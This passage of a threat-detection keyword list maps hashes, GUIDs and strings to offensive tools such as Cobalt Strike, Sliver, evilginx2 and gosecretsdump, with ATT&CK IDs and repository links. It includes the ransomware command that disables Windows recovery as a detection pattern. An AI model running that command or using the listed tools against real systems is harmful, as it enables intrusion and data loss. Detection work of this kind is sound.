T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*bc11b2b14526fef7b745fa22f0359235fab202060716f0c9544e4ef899c7312e*",".{0,1000}bc11b2b14526fef7b745fa22f0359235fab202060716f0c9544e4ef899c7312e.{0,1000}","offensive_tool_keyword","teams_dump","PoC for dumping and decrypting cookies in the latest version of Microsoft Teams","T1560.001 - T1555.003 - T1113 - T1557","TA0006 - TA0005 - TA0009","N/A","N/A","Credential Access","https://github.com/byinarie/teams_dump","1","0","N/A","7","2","121","19","2023-11-12T18:47:55Z","2023-09-18T18:33:32Z" "*bc2ce508993e19027fb23f837dd48da400898cbc83d9adde6febb803e76817ed*",".{0,1000}bc2ce508993e19027fb23f837dd48da400898cbc83d9adde6febb803e76817ed.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*bc3023b36063a7681db24681472b54fa11f0d4ec*",".{0,1000}bc3023b36063a7681db24681472b54fa11f0d4ec.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*bc422a4e1b6a351ac6fe73d496015cfa6a9dbd5e38566c6f44a59faff83ee95a*",".{0,1000}bc422a4e1b6a351ac6fe73d496015cfa6a9dbd5e38566c6f44a59faff83ee95a.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","N/A","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","file_hash","8","10","7984","1339","2024-04-19T07:11:03Z","2020-11-13T16:35:20Z" "*bc5d95f4894db18e69826a772226989ca19ea7e63dbb9fa13775836a0b25cdb5*",".{0,1000}bc5d95f4894db18e69826a772226989ca19ea7e63dbb9fa13775836a0b25cdb5.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*bc7a70c2b56c5e036a0750ab7c93511235161e84f913f538d5e12882b66d965a*",".{0,1000}bc7a70c2b56c5e036a0750ab7c93511235161e84f913f538d5e12882b66d965a.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*BCBC884D-2D47-4138-B68F-7D425C9291F9*",".{0,1000}BCBC884D\-2D47\-4138\-B68F\-7D425C9291F9.{0,1000}","offensive_tool_keyword","SharpShares","Multithreaded C# .NET Assembly to enumerate accessible network shares in a domain","T1046 - T1135","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/Hackcraft-Labs/SharpShares","1","0","N/A","9","1","29","6","2023-11-13T14:08:07Z","2023-10-25T10:34:18Z" "*bcc2_setenv*",".{0,1000}bcc2_setenv.{0,1000}","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CrossC2/CrossC2Kit","1","1","N/A","10","10","193","33","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z" "*bcc2_spawn*",".{0,1000}bcc2_spawn.{0,1000}","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CrossC2/CrossC2Kit","1","1","N/A","10","10","193","33","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z" "*bcd23b279a6821e726d190afb11762f53741de0c8ee4724925a3c908e55725b5*",".{0,1000}bcd23b279a6821e726d190afb11762f53741de0c8ee4724925a3c908e55725b5.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*bcdedit.exe /set {default} recoveryenabled No*",".{0,1000}bcdedit\.exe\s\/set\s\{default\}\srecoveryenabled\sNo.{0,1000}","offensive_tool_keyword","blackcat ransomware","BlackCat Ransomware behavior","T1486.001 - T1489 - T1490 - T1486","TA0011 - TA0010 - TA0012 - TA0007 - TA0040","blackcat ransomware","N/A","Ransomware","https://www.sentinelone.com/labs/blackcat-ransomware-highly-configurable-rust-driven-raas-on-the-prowl-for-victims/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*bced4fc981001259eacc23145a5968deda2cfaf64db8e3ffebf2b6ae5bcda874*",".{0,1000}bced4fc981001259eacc23145a5968deda2cfaf64db8e3ffebf2b6ae5bcda874.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*bcfe13901d4207db340d957052cd5175e24481a5e2c5fc15d119fadedc664755*",".{0,1000}bcfe13901d4207db340d957052cd5175e24481a5e2c5fc15d119fadedc664755.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*BCHASH-Rijndael-128.unverified.test-vectors.txt*",".{0,1000}BCHASH\-Rijndael\-128\.unverified\.test\-vectors\.txt.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*BCHASH-Rijndael-256.unverified.test-vectors.txt*",".{0,1000}BCHASH\-Rijndael\-256\.unverified\.test\-vectors\.txt.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*bcrossc2_load_dyn*",".{0,1000}bcrossc2_load_dyn.{0,1000}","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","2127","327","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z" "*BC-SECURITY*",".{0,1000}BC\-SECURITY.{0,1000}","offensive_tool_keyword","Github Username","Cybersecurity Engineers and Offensive Security enthusiasts actively maintaining/updating Powershell Empire in our spare time.","T1021 - T1024 - T1027 - T1059 - T1074 - T1053","TA0008 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://github.com/BC-SECURITY","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*BC-SECURITY*Malleable*",".{0,1000}BC\-SECURITY.{0,1000}Malleable.{0,1000}","offensive_tool_keyword","cobaltstrike","Malleable C2 Profiles. A collection of profiles used in different projects using Cobalt Strike & Empire.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","10","10","284","46","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z" "*bc-security/empire*",".{0,1000}bc\-security\/empire.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "*BC-SECURITY/Starkiller*",".{0,1000}BC\-SECURITY\/Starkiller.{0,1000}","offensive_tool_keyword","empire","Starkiller is a Frontend for Powershell Empire. It is a web application written in VueJS","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Starkiller","1","1","N/A","N/A","10","1268","189","2024-02-22T06:34:08Z","2020-03-09T05:48:58Z" "*bd326bcb0c8473cbae427c5e7cdfdb9b9cdab27d0df73f67c704eeb962f8db96*",".{0,1000}bd326bcb0c8473cbae427c5e7cdfdb9b9cdab27d0df73f67c704eeb962f8db96.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*bd346689-8ee6-40b3-858b-4ed94f08d40a*",".{0,1000}bd346689\-8ee6\-40b3\-858b\-4ed94f08d40a.{0,1000}","offensive_tool_keyword","ForgeCert","ForgeCert uses the BouncyCastle C# API and a stolen Certificate Authority (CA) certificate + private key to forge certificates for arbitrary users capable of authentication to Active Directory.","T1553.002 - T1136.003 - T1059.001","TA0006 - TA0002","N/A","N/A","Defense Evasion","https://github.com/GhostPack/ForgeCert","1","0","N/A","10","6","589","96","2022-10-07T18:18:09Z","2021-06-09T22:04:18Z" "*bd43503a9105de8acb54f9dc566d68f3bb7d9b75fdb2ceb5fe939d52791bfdf5*",".{0,1000}bd43503a9105de8acb54f9dc566d68f3bb7d9b75fdb2ceb5fe939d52791bfdf5.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*bd514bc9dda0863e30e834afcf4d5b406c228f10a980ad3f434867d5aa6ef592*",".{0,1000}bd514bc9dda0863e30e834afcf4d5b406c228f10a980ad3f434867d5aa6ef592.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*BD602C80-47ED-4294-B981-0119D2200DB8*",".{0,1000}BD602C80\-47ED\-4294\-B981\-0119D2200DB8.{0,1000}","offensive_tool_keyword","D1rkInject","Threadless injection that loads a module into the target process and stomps it and reverting back memory protections and original memory state","T1055 - T1055.012 - T1055.002 - T1574.002","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/D1rkInject","1","0","N/A","9","2","154","27","2023-08-02T02:45:46Z","2023-08-02T02:13:55Z" "*bd63af36618538f67b2bf90652fb7536b40c915b307a69887df67bd5cf0400b6*",".{0,1000}bd63af36618538f67b2bf90652fb7536b40c915b307a69887df67bd5cf0400b6.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*BD745A5E-A1E9-4FDD-A15B-E9F303A625AE*",".{0,1000}BD745A5E\-A1E9\-4FDD\-A15B\-E9F303A625AE.{0,1000}","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","197","30","2024-03-10T15:40:05Z","2023-08-13T22:10:46Z" "*bd745a5e-a1e9-4fdd-a15b-e9f303a625ae*",".{0,1000}bd745a5e\-a1e9\-4fdd\-a15b\-e9f303a625ae.{0,1000}","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","197","30","2024-03-10T15:40:05Z","2023-08-13T22:10:46Z" "*bd7552c78fd3f852e39b140051c4a1aa5a30a14e23eee49cfb570e19b4dbb0fa*",".{0,1000}bd7552c78fd3f852e39b140051c4a1aa5a30a14e23eee49cfb570e19b4dbb0fa.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/C-Sto/gosecretsdump","1","0","N/A","10","4","354","48","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z" "*bd78ea00b16797551d4f40297f42e9b1f9d912f416a115c3eb10f340246a9d54*",".{0,1000}bd78ea00b16797551d4f40297f42e9b1f9d912f416a115c3eb10f340246a9d54.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*bd852d46ed2140ee627ff0798c12d589db9687c7de1b23160fe02a5570163d54*",".{0,1000}bd852d46ed2140ee627ff0798c12d589db9687c7de1b23160fe02a5570163d54.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*bd976ca9268513e6cc4a58b85574f62b8a76cc92*",".{0,1000}bd976ca9268513e6cc4a58b85574f62b8a76cc92.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","10","10","735","120","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z" "*bd99cb3ea030932e00edee60aa4a03d9fdc70d031adaa389d8c6ab12982efcaa*",".{0,1000}bd99cb3ea030932e00edee60aa4a03d9fdc70d031adaa389d8c6ab12982efcaa.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*bda4e12386c2e02081373da1ac905a6fba42ecdb2310d06aa2dc6df8b71ef544*",".{0,1000}bda4e12386c2e02081373da1ac905a6fba42ecdb2310d06aa2dc6df8b71ef544.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*bdamele/icmpsh*",".{0,1000}bdamele\/icmpsh.{0,1000}","offensive_tool_keyword","icmpsh","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/r00t-3xp10it/venom","1","1","N/A","10","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*bdcfb9b63fd01bdd50427f205338e26e8001015b4fe14b6016cfb08e37c08a6e*",".{0,1000}bdcfb9b63fd01bdd50427f205338e26e8001015b4fe14b6016cfb08e37c08a6e.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*bdcsync*",".{0,1000}bdcsync.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*bde38d20d4eb1a86cc38a81cc92861b3d366210af570ecb6fea93ac1060eaa7d*",".{0,1000}bde38d20d4eb1a86cc38a81cc92861b3d366210af570ecb6fea93ac1060eaa7d.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - 